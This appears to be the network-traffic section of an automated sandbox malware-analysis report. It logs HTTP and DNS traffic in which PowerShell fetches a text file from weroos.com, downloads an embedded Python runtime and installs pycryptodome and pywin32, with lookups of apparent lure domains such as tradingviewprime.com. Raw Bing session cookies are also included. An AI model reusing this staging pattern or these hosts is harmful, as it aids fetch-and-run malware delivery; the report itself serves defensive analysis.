Source: global traffic	HTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:666,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:650,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /SDkwjk.txt HTTP/1.1Host: weroos.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ftp/python/3.11.8/python-3.11.8-embed-amd64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.python.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get-pip.py HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bootstrap.pypa.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /simple/pip/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /simple/setuptools/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /simple/wheel/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /rp/a2xp3ZIPaHymjkEpVoRLe8IDcCs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/bW5YZAHlbTlzzS2JT_speOW7v7c.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /simple/pycryptodome/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /simple/pypiwin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/d0/1b/2f292bbd742e369a100c91faa0483172cd91a1a422a6692055ac920946c5/pypiwin32-223-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /simple/pywin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: GET /packages/b3/bd/d1592635992dd8db5bb8ace0551bc3a769de1ac8850200cfa517e72739fb/pywin32-310-cp311-cp311-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: /Connection: keep-alive

Source: global traffic	DNS traffic detected: DNS query: flexjjet.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: lh3.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: duckduckgo.com
Source: global traffic	DNS traffic detected: DNS query: improving.duckduckgo.com
Source: global traffic	DNS traffic detected: DNS query: links.duckduckgo.com
Source: global traffic	DNS traffic detected: DNS query: external-content.duckduckgo.com
Source: global traffic	DNS traffic detected: DNS query: tradingviewprime.com
Source: global traffic	DNS traffic detected: DNS query: use.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: weroos.com
Source: global traffic	DNS traffic detected: DNS query: www.python.org
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: bootstrap.pypa.io
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: pypi.org
Source: global traffic	DNS traffic detected: DNS query: files.pythonhosted.org
Source: global traffic	DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons4.gvt2.com

Source: unknown

HTTP traffic detected: POST /report/v4?s=bXQBxwAmZ7WxIqrZ0FChpzdGoPx9uxGr2HeEbWo7rCx9Tyd3CBrjKvdEM2F91EIFFH1y7ZhDPqWz%2Fy1UgqhsizgwRAV5xY25CZSY7Q%3D%3D HTTP/1.1host: a.nel.cloudflare.comcontent-length: 406content-type: application/reports+jsonorigin: https://flexjjet.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 09 Jun 2025 20:47:23 GMTcontent-type: text/htmlserver: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}cache-control: max-age=14400cf-cache-status: EXPIREDvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=bXQBxwAmZ7WxIqrZ0FChpzdGoPx9uxGr2HeEbWo7rCx9Tyd3CBrjKvdEM2F91EIFFH1y7ZhDPqWz%2Fy1UgqhsizgwRAV5xY25CZSY7Q%3D%3D"}]}cf-ray: 94d37bdbfc5166fb-DFWalt-svc: h3=":443"; ma=86400content-length: 548
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginxdate: Mon, 09 Jun 2025 20:47:44 GMTcontent-type: image/pngcontent-length: 1478etag: "67408724-5c6"strict-transport-security: max-age=31536000permissions-policy: interest-cohort=()x-frame-options: SAMEORIGINx-xss-protection: 1;mode=blockx-content-type-options: nosniffreferrer-policy: originexpect-ct: max-age=0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 09 Jun 2025 20:47:48 GMTcontent-type: text/htmlserver: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}cache-control: max-age=14400cf-cache-status: EXPIREDvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=87rhUTSMg8CR%2FafArohAn7%2Fa1TRwzN98YeixFhXGTd2Y4BXkheG2UI1wTungOZa%2Bd%2FOgKP%2BRGCDxUbotXeGHNghcsiO5sBKG%2B%2BEubQ%3D%3D"}]}cf-ray: 94d37c770d2b66fb-DFWalt-svc: h3=":443"; ma=86400content-length: 548

Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bootstrap.pypa.io
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
